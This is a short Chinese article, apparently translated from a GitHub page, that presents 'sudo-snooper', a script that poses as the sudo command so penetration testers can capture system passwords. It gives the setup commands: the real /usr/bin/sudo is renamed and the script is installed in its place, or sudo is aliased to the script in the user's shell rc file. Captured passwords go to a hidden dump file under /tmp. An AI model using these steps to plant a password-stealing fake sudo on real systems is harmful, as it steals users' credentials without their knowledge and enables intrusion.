sudo-snooper：一款伪装成sudo命令的“蜜罐”脚本

sudo-snooper是一款伪装成sudo命令的“蜜罐”脚本，可以帮助渗透测试人员进行系统密码的获取。

安装步骤

Option 1：在原生sodu的安装位置安装，需要root权限，并把原生sudo程序重命名

# mv /usr/bin/sudo /usr/bin/somename

修改sudo-snooper.py参数

dumpdir = "/tmp/.snooper"dumpfile = "/tmp/.snooper/dump.txt"sudo = 'sudo'

/usr/bin/sudo中安装python文件

# install -dm755 sudo-snooper.py /usr/bin/sudo

给予python执行文件权限

Option 2 – alias sudo命令

在当前用户shell中修改.rc文件（可能是.bashrc .zshrc等）

alias sudo=’python3.5 /path/to/sudo-snooper.py’

使用方式

运行后，伪装的sudo会向用户征询正确的密码，然后你可以在sudo vim /etc/resolv.conf中查看记录下的密码。

下载地址 <点击阅读原文按钮查看>

* 参考来源：GitHub，本文译者：phper，转载请注明来自FreeBuf.COM